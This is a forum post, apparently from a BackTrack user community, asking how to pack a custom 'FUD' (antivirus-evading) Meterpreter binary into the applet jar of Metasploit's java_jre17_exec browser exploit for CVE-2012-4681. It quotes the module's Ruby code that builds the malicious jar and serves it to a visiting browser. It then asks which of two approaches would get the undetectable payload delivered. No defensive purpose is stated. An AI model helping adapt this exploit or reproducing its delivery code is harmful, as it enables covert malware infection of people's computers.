Hello BT!
I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.
Here's the exploit:
Code:
/opt/metasploit/msf3/modules/exploits/multi/browser/java_jre17_exec.rb

The interesting lines are:
Code:
p = regenerate_payload(cli)
jar = p.encoded_jar
paths.each do |path|
  1.upto(path.length - 1) do |idx|
    full = path[0,idx].join("/") + "/"
    if !(jar.entries.map{|e|e.name}.include?(full))
      jar.add_file(full, '')
    end
  end
  fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
  data = fd.read(fd.stat.size)
  jar.add_file(path.join("/"), data)
  fd.close
  #jar.each do |num| --------- tried to see what does the jar array contain, but it doesn't show up in the console. Am I doing it wrong?
  #puts num
  #end
end
print_status("Sending Applet.jar")
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
handler( cli )
end

I think "jar.pack" is the final result.
So I have two options:
1) Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
2) Create my own jar and replace it with "jar.pack".
Do you have some ideas?
Thanks.


